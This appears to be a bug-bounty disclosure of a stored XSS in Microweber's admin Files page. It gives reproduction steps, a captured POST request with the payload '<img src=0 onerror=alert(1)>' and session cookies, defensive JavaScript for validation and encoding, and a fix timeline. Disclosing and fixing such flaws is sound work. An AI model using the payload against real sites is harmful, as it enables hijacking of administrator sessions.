Cross-site Scripting (XSS) - Stored in microweber/microweber

Valid

Reported on

Feb 22nd 2022


Description

I found a stored XSS vulnerability on the admin page: https://demo.microweber.org/demo/admin/view:settings#option_group=files

Proof of Concept

Step 1: Go to Settings > Website settings > Files
Step 2: Create a new folder with the folder name: <img src=0 onerror=alert(1)>

// Request
---------------------------------------
POST /demo/api/create_media_dir HTTP/1.1
Host: demo.microweber.org
Cookie: back_to_admin=https%3A//demo.microweber.org/demo/admin/view%3Asettings%23option_group%3Dfiles; csrf-token-data=%7B%22value%22%3A%22CWFoo1r5aSs0Eh43ggbPh7ZrADzLJq9pqxcn2oVo%22%2C%22expiry%22%3A1645524272281%7D; mw-back-to-live-edit=true; show-sidebar-layouts=0; laravel_session=pnfZUavpfYyBW2Nem7BpY0Ove87uyklKnGMAZgpA; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CRrQ72IHSMWcZZ25VCSQGCbqyg25qhWmSDCJNwDVH4X3Z736hG3mxHR05oNrZ%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 60
Origin: https://demo.microweber.org
Referer: https://demo.microweber.org/demo/admin/view:settings
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

path=&name=%3Cimg+src%3D0+onerror%3Dalert(1)%3E&new_folder=1
---------------------------------------

Step 3: After the folder is created successfully, the alert popup appears

PoC:
Request: https://drive.google.com/file/d/1daorHwquywP3LPh6na5PIZzWb2lEL19W/view?usp=sharing
Alert popup: https://drive.google.com/file/d/1iTtAwQNHrpfktGHHXDrJ_7XPYlBOAHxe/view?usp=sharing

Impact

This vulnerability allows stored XSS: the malicious folder name is persisted and its script executes in the browser of whoever opens the Files settings page in the admin panel.
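The root cause of the report above is a folder name that is accepted as-is and later placed into admin-panel markup without encoding. The following is an added example, not Microweber's code and not the fix referenced in the timeline below; it shows the two defensive layers a maintainer would want at an endpoint like create_media_dir: allowlist validation of the name on input, and HTML encoding of the name on output. The handler shape (handleCreateDir), the allowlist rule (SAFE_NAME_RE) and the list-item markup are assumptions chosen for illustration; the form body is the decoded request body from the PoC.

```javascript
// Added example (not Microweber's code): defensive handling of a media
// directory name such as the one submitted in the PoC request above.
// Layer 1: validateDirName() applies an allowlist at the API boundary.
// Layer 2: escapeHtml() encodes the name before it becomes HTML, so a
//          name that slipped past validation still cannot become markup.

// Constructed sample: the decoded "name" field from the captured request.
const POC_NAME = '<img src=0 onerror=alert(1)>';

// Assumed allowlist: letters, digits, space, underscore, dot, hyphen;
// must start with an alphanumeric; at most 128 characters.
const SAFE_NAME_RE = /^[A-Za-z0-9][A-Za-z0-9 _.-]{0,127}$/;

function validateDirName(name) {
  if (typeof name !== 'string') return { ok: false, reason: 'not a string' };
  // Reject empty names and dot segments explicitly, then path separators,
  // then anything outside the allowlist (which covers <, >, quotes, etc.).
  if (name === '' || name === '.' || name === '..') {
    return { ok: false, reason: 'empty or dot segment' };
  }
  if (name.includes('/') || name.includes('\\')) {
    return { ok: false, reason: 'path separator' };
  }
  if (!SAFE_NAME_RE.test(name)) {
    return { ok: false, reason: 'disallowed character' };
  }
  return { ok: true, reason: '' };
}

// Minimal HTML text/attribute encoder for the five significant characters.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable rendering pattern: the stored name is interpolated directly
// into markup, so a name containing tags becomes live HTML in the admin UI.
function renderFolderRowUnsafe(name) {
  return `<li class="folder">${name}</li>`;
}

// Hardened rendering: identical markup, but the name is encoded first.
function renderFolderRowSafe(name) {
  return `<li class="folder">${escapeHtml(name)}</li>`;
}

// Decode an application/x-www-form-urlencoded body like the captured one.
function parseFormBody(body) {
  return Object.fromEntries(new URLSearchParams(body).entries());
}

// Assumed handler shape (not the real create_media_dir): validate on input,
// refuse bad names with 400, and only ever render the name encoded.
function handleCreateDir(body) {
  const fields = parseFormBody(body);
  const verdict = validateDirName(fields.name ?? '');
  if (!verdict.ok) {
    return { status: 400, error: `invalid folder name: ${verdict.reason}` };
  }
  return { status: 200, html: renderFolderRowSafe(fields.name) };
}

// Stand-alone demonstration on the PoC body and on a benign name.
if (typeof require !== 'undefined' && require.main === module) {
  const pocBody = 'path=&name=%3Cimg+src%3D0+onerror%3Dalert(1)%3E&new_folder=1';
  console.log('PoC body  ->', JSON.stringify(handleCreateDir(pocBody)));
  console.log('benign    ->', JSON.stringify(handleCreateDir('path=&name=Photos+2022&new_folder=1')));
  console.log('unsafe    ->', renderFolderRowUnsafe(POC_NAME));
  console.log('encoded   ->', renderFolderRowSafe(POC_NAME));
}
```

The two layers are deliberately independent: validation protects the file system and keeps unexpected characters out of stored data, while output encoding is what actually prevents script execution, so the encoding must be applied wherever the name is rendered even after validation is in place.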

We are processing your report and will contact the microweber team within 24 hours. 3 months ago
We have contacted a member of the microweber team and are waiting to hear back 3 months ago
Bozhidar Slaveykov validated this vulnerability 3 months ago
Andy has been awarded the disclosure bounty
The fix bounty is now up for grabs
Bozhidar Slaveykov confirmed that a fix has been merged on c897d0 3 months ago
Bozhidar Slaveykov has been awarded the fix bounty